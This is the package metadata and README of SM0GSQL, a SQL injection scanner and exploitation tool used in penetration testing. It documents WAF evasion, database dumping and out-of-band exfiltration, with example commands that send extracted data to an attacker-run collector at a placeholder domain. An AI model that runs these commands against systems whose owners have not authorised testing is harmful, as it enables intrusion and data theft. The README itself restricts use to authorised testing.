Metadata-Version: 2.4
Name: sm0g-sql
Version: 0.1.5
Summary: SM0GSQL — Context-aware SQL injection scanner with WAF detection and evasion
Author: SM0G-SEC
License-Expression: AGPL-3.0-or-later
License-File: LICENSE
Keywords: bugbounty,pentest,scanner,security,sql-injection,sqli
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Requires-Python: >=3.11
Requires-Dist: requests>=2.28.0
Requires-Dist: sm0g-engine>=0.1.5
Requires-Dist: urllib3>=1.26.0
Provides-Extra: dev
Requires-Dist: mypy>=1.0; extra == 'dev'
Requires-Dist: pytest-asyncio>=0.23; extra == 'dev'
Requires-Dist: pytest-mock>=3.0; extra == 'dev'
Requires-Dist: pytest>=8.0; extra == 'dev'
Requires-Dist: requests-mock; extra == 'dev'
Requires-Dist: ruff>=0.4; extra == 'dev'
Requires-Dist: types-requests; extra == 'dev'
Description-Content-Type: text/markdown

# SM0GSQL

> **Context-aware SQL injection scanner** with WAF detection, evasion, and one-command data extraction.

[![PyPI](https://img.shields.io/pypi/v/sm0g-sql.svg)](https://pypi.org/project/sm0g-sql/)
[![Python](https://img.shields.io/pypi/pyversions/sm0g-sql.svg)](https://pypi.org/project/sm0g-sql/)
[![License: AGPL-3.0-or-later](https://img.shields.io/badge/license-AGPL--3.0--or--later-blue.svg)](LICENSE)

```text
+--------------------------------------------------------------+
|                                                              |
|╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╮|
|╎   ◎ INFIL   ╎ ╎  ◈ BYPASS   ╎ ╎  ▣ OPERATE  ╎ ╎ ⊟ EXTRACT  ╎|
|╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╯|
|                                                              |
+==============================================================+
|   _____ __  __  ___   _____  _____  ____  _                  |
|  / ____|  \/  |/ _ \ / ____|/ ____|/ __ \| |                 |
| | (___ | \  / | | | | |  __| (___ | |  | | |                 |
|  \___ \| |\/| | | | | | |_ |\___ \| |  | | |                 |
|  ____) | |  | | |_| | |__| |____) | |__| | |____             |
| |_____/|_|  |_|\___/ \_____|_____/ \___\_\______|            |
+==============================================================+
```

---

## Highlights

- 🎯 **Six detection techniques** — error-based, boolean-blind, time-blind, UNION, stacked-query, and out-of-band (OOB).
- ⚡ **Async engine** — concurrent probing over httpx; timing-sensitive checks fall back to a sequential stall mode for accurate time-based oracles.
- 🛡️ **WAF fingerprinting + evasion** — detects the wall in front of the app and adapts payloads to get past it.
- 💉 **One-command extraction** — confirm an injection and dump schemas, tables, and rows in the same run with `--exploit`.
- 🗄️ **All major backends** — MySQL/MariaDB, PostgreSQL, MSSQL, Oracle, and SQLite.
- 🕸️ **Surface discovery** — built-in crawler, headless-browser crawl, and OpenAPI spec ingestion.
- 📄 **Reports everywhere** — terminal summary plus HTML, JSON, and SARIF (CI / code-scanning) output.

## Install

```bash
pip install sm0g-sql
```

This pulls the engine dependencies (`sm0g-cli`, `sm0g-core`, `sm0g-payloads`) automatically.

<details>
<summary>From source (development)</summary>

```bash
git clone <repo> && cd SM0GSQL
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev]"     # editable install + test/lint tooling
pytest -q                   # run the suite
```
</details>

## Quick start

```bash
# scan a single URL
sm0gsql "https://target.tld/item?id=1"

# crawl first, then scan everything found
sm0gsql "https://target.tld/" --crawl

# confirm + extract in one shot (writes HTML/TXT/JSON into a per-target folder)
sm0gsql "https://target.tld/item?id=1" --exploit
```

## Techniques

Pass any combination to `--technique` (default: `EBTUO`):

| Flag | Technique      | Notes                                            |
|:----:|----------------|--------------------------------------------------|
| `E`  | Error-based    | Reads DBMS errors reflected in the response.     |
| `B`  | Boolean-blind  | Differential true/false response analysis.       |
| `T`  | Time-blind     | Time-delay oracle (uses the sequential stall mode). |
| `U`  | UNION          | Column-count discovery + UNION data read.        |
| `S`  | Stacked query  | Stacked statements where the driver allows them. |
| `O`  | Out-of-band    | DNS/HTTP exfil via the bundled collector (below).|

```bash
sm0gsql "https://target.tld/item?id=1" --technique BTU --risk 2 --level 2
```

## Usage

```text
sm0gsql <url> [options]
```

| Option | Description | Default |
|--------|-------------|:-------:|
| `--technique EBTUSO` | Techniques to run (see table above) | `EBTUO` |
| `--risk 1-3` | Payload aggressiveness | `1` |
| `--level 1-3` | Injection-point depth | `1` |
| `--dbms NAME` | Backend hint: `mysql`, `postgres`, `mssql`, `oracle`, `sqlite` | `auto` |
| `--crawl` | Crawl the site before scanning | off |
| `--crawl-depth N` | Crawler depth | `3` |
| `--browser-crawl` | Use a headless browser to crawl | off |
| `--openapi PATH/URL` | Seed surfaces from an OpenAPI spec | — |
| `--exploit` | Extract data after a confirmed finding | off |
| `--dump TABLE` / `--dump-all` | Dump a table / all tables | — |
| `--dump-rows N` | Max rows per table (`0` = default cap) | `0` |
| `--oob DOMAIN` | OOB callback domain | — |
| `--oob-poll URL` | Endpoint returning observed callbacks | — |
| `--login-url / --login-user / --login-pass` | Authenticate before scanning | — |
| `-H "Name: Value"` | Add a header (repeatable) | — |
| `--cookies "k=v; ..."` | Cookie string | — |
| `--proxy URL` | Route traffic through an HTTP proxy | — |
| `--evasion MODE` | WAF-evasion transform(s) | — |
| `--random-agent` | Rotate the User-Agent | off |
| `--threads N` | Concurrency | `5` |
| `--timeout N` / `--delay S` | Request timeout / per-request delay | `15` / `0` |
| `--time-threshold N` | Time-based oracle threshold (s) | `4` |
| `--verify-ssl` | Verify TLS certificates | off |
| `-d, --data BODY` | POST body | — |
| `--output-json / --output-sarif / --report-html PATH` | Write reports | — |
| `-v, --verbose` | Verbose output | off |

## Out-of-band extraction

OOB techniques exfiltrate data through DNS/HTTP callbacks. A minimal collector ships
with the package as the `sm0gsql-oob` command — run it on a host the target can reach:

```bash
sudo sm0gsql-oob          # DNS on udp/53, poll endpoint on http://0.0.0.0:8000/poll
```

Then point the target's resolver at that box and run the scan:

```bash
sm0gsql "https://target.tld/item?id=1" \
  --technique O --oob exfil.your-domain.tld \
  --oob-poll http://your-collector:8000/poll
```

> Binding `udp/53` requires root / `CAP_NET_BIND_SERVICE`.

## Output & reports

- **Terminal** — a colored summary of every confirmed finding.
- **`--exploit`** — writes `JSON` + `TXT` + `HTML` into a `./<target-host>/` folder.
- **`--report-html` / `--output-json` / `--output-sarif`** — emit individual reports anywhere; SARIF plugs straight into CI / code-scanning.

## Authorization & legal

SM0GSQL is for **authorized security testing only** — penetration tests, bug-bounty
programs within scope, CTFs, and your own lab/staging systems. Running it against
systems you do not own or have **explicit written permission** to test is illegal in
most jurisdictions. You are solely responsible for how you use this tool.

## License

[AGPL-3.0-or-later](LICENSE) — Copyright (c) 2026 SM0G-SEC by roc1t1z3not.
